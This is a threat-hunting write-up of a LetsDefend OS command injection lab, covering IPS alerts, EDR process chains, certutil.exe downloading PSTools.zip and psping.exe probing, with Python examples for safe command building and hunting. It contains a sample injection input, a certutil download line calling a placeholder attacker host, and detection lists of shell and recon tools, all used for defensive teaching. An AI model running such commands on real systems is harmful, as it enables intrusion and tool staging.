This write-up is based on a training scenario from LetsDefend and is shared for educational purposes only.

Hello everyone, I'm Fir (find me on LinkedIn). In this article, I'll share my threat hunting investigation based on a network-based attack scenario from LetsDefend.

In this lab, I investigated an OS Command Injection attack by analyzing IPS alerts, firewall logs, and endpoint telemetry to understand attacker behavior and post-exploitation activity.

🧠 Hypothesis

Attackers could exploit web applications to execute system-level commands remotely, potentially leading to further compromise or lateral movement.
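To make the hypothesis concrete, the following is an added example (not part of the LetsDefend scenario or this write-up's original material) showing the code-level root cause of OS Command Injection and its hardened form. The `ping` wrapper, its parameters and the `ipaddress`-based validation are assumptions chosen for illustration; the point is that the unsafe version lets shell metacharacters in a request parameter reach the shell, while the safe version validates the input type and never invokes a shell.

```python
"""OS Command Injection root cause and hardened form (added example)."""
import ipaddress
import subprocess

# Characters that a shell interprets as command separators/operators.
SHELL_METACHARACTERS = set(";|&`$()<>\n")


def has_shell_metacharacters(value: str) -> bool:
    """Input-validation check: True if the value could alter a shell command."""
    return any(ch in SHELL_METACHARACTERS for ch in value)


def build_ping_unsafe(host: str) -> str:
    """Anti-pattern: user input concatenated into a shell command string.

    If this string is handed to a shell (os.system / subprocess with
    shell=True), any separator in `host` ends the ping command and starts
    a new one, so the request parameter decides what executes.
    """
    return f"ping -n 1 {host}"


def build_ping_safe(host: str) -> list[str]:
    """Hardened form: validate against the narrow type we expect and build
    an argv list. No shell ever parses the value, so metacharacters are
    just bytes inside one argument (and here they are rejected outright
    because they are not a valid IP address).
    """
    try:
        addr = ipaddress.ip_address(host)
    except ValueError as exc:
        raise ValueError(f"rejected host parameter: {host!r}") from exc
    return ["ping", "-n", "1", str(addr)]


def run_ping_safe(host: str) -> subprocess.CompletedProcess:
    """Execute the validated argv with shell=False (assumed wrapper)."""
    return subprocess.run(
        build_ping_safe(host),
        shell=False,
        capture_output=True,
        text=True,
        timeout=10,
    )


if __name__ == "__main__":
    good = "127.0.0.1"
    print("safe argv:", build_ping_safe(good))
    bad = "127.0.0.1; whoami"  # constructed input with a shell separator
    print("unsafe string would be:", build_ping_unsafe(bad))
    print("metacharacters present:", has_shell_metacharacters(bad))
    try:
        build_ping_safe(bad)
    except ValueError as err:
        print("safe builder rejected it:", err)
```

The detection lesson follows directly from the code: a web server process should never need to spawn `cmd.exe` at all when commands are built as argv lists, so any shell child of the web server is itself a strong hunting signal.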

Step 1 : IPS Detection (Initial Attack Identification)

I started by analyzing IPS logs to identify suspicious attack activity. The firewall action of "alert" indicates the attack was detected but not blocked.

Attacker IP: 124.31.2.92
Attack type: OS Command Injection Attempt
Firewall action: alert

Step 2 : Command Execution Analysis

I analyzed what command was executed during the attack. This confirms initial reconnaissance: whoami is commonly used to identify the user context the web server is running as.

Command executed : whoami

Step 3 : EDR Investigation (Process Analysis)

I pivoted into endpoint telemetry to analyze process execution. The command was spawned by the web server process, confirming exploitation of a web application.

Parent process : C:\Windows\System32\apache.exe

Step 4 : LOLBins Abuse

Further investigation revealed additional suspicious activity. This indicated the attacker used Living-off-the-Land techniques to download tools for further actions.

LOLBin used: certutil.exe
File downloaded: PSTools.zip

Step 5 : Suspicious Network Activity

I then analyzed outbound connections from the endpoint. This suggests potential network probing or lateral movement activity.

Suspicious process: psping.exe
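Steps 3 to 5 can be turned into a single hunting query over process telemetry. The following is an added example, not part of the LetsDefend lab or this write-up's original material: it walks a process tree (Sysmon-style pid/ppid/image/command line fields are assumed) and flags the three behaviours seen in the investigation, a shell or recon binary whose ancestry includes the web server, certutil.exe used as a downloader, and PsTools network probing with psping.exe. The events, PIDs and the download host are constructed sample data; the ancestry walk is what separates the `whoami` under apache.exe from a benign `whoami` typed by an interactive user.

```python
"""Hunt for web-server command injection follow-on activity (added example)."""
import re
from dataclasses import dataclass

# Images that should essentially never have shells or recon tools beneath them.
WEB_SERVER_IMAGES = {"apache.exe", "httpd.exe", "w3wp.exe", "nginx.exe", "php-cgi.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "sh.exe", "bash.exe"}
RECON_IMAGES = {"whoami.exe", "net.exe", "ipconfig.exe", "systeminfo.exe", "tasklist.exe"}
PROBE_IMAGES = {"psping.exe", "psexec.exe"}  # Sysinternals tools from PSTools.zip
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields assumed)."""
    pid: int
    ppid: int
    image: str
    command_line: str


# Constructed sample telemetry mirroring the lab's chain plus one benign decoy.
SAMPLE_EVENTS = [
    ProcessEvent(4, 0, "System", ""),
    ProcessEvent(100, 4, r"C:\Windows\System32\apache.exe", "apache.exe -k runservice"),
    ProcessEvent(200, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent(201, 200, r"C:\Windows\System32\whoami.exe", "whoami"),
    ProcessEvent(202, 200, r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -urlcache -split -f http://ATTACKER-HOST-PLACEHOLDER/PSTools.zip PSTools.zip"),
    ProcessEvent(203, 200, r"C:\Tools\psping.exe", "psping.exe -n 1 10.0.0.15:445"),
    ProcessEvent(50, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(401, 50, r"C:\Windows\System32\whoami.exe", "whoami"),  # benign admin check
]


def basename(path: str) -> str:
    """Lower-cased file name of an image path, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(event: ProcessEvent, by_pid: dict) -> list:
    """Return ancestor image basenames from nearest parent up to the root."""
    chain, seen, pid = [], set(), event.ppid
    while pid in by_pid and pid not in seen:
        seen.add(pid)  # guard against pid reuse creating a cycle
        parent = by_pid[pid]
        chain.append(basename(parent.image))
        pid = parent.ppid
    return chain


def hunt(events: list) -> list:
    """Apply the three hunting rules and return findings with their process chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = basename(e.image)
        chain = ancestry(e, by_pid)
        under_web = any(a in WEB_SERVER_IMAGES for a in chain)
        rule = None
        if under_web and img in SHELL_IMAGES:
            rule = "web_server_spawned_shell"          # Step 3
        elif under_web and img in RECON_IMAGES:
            rule = "recon_under_web_server"            # Steps 2/3
        elif img == "certutil.exe" and (
            "urlcache" in e.command_line.lower() or URL_RE.search(e.command_line)
        ):
            rule = "certutil_download"                 # Step 4
        elif img in PROBE_IMAGES:
            rule = "sysinternals_probe"                # Step 5
        if rule:
            findings.append({
                "rule": rule,
                "pid": e.pid,
                "image": img,
                "chain": " <- ".join([img] + chain),
                "command_line": e.command_line,
            })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['rule']}] pid={f['pid']} chain={f['chain']}")
        print(f"    {f['command_line']}")
```

Running it on the sample data yields four findings for PIDs 200 to 203 and nothing for the interactive `whoami` (PID 401), because its ancestry is explorer.exe rather than apache.exe. The same ancestry logic ports directly to a SIEM or EDR query language: join process events to their parents and filter on the web server image anywhere in the chain, not only as the immediate parent.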

Conclusion

This investigation shows how a simple web vulnerability can lead to deeper compromise. The IPS successfully detected an OS Command Injection attempt, but the attack was not blocked, allowing the attacker to execute reconnaissance commands like whoami. The activity was traced back to the web server process (apache.exe), confirming exploitation through the application layer. Further analysis revealed the use of LOLBins such as certutil.exe to download additional tools, along with suspicious network activity initiated by psping.exe. This demonstrates that even low-severity alerts can evolve into more serious threats if not properly investigated and mitigated.

Thanks for reading! If you're learning threat hunting or SOC analysis, feel free to share your thoughts in the comments 👋 What kind of attack scenario are you exploring next? 🔥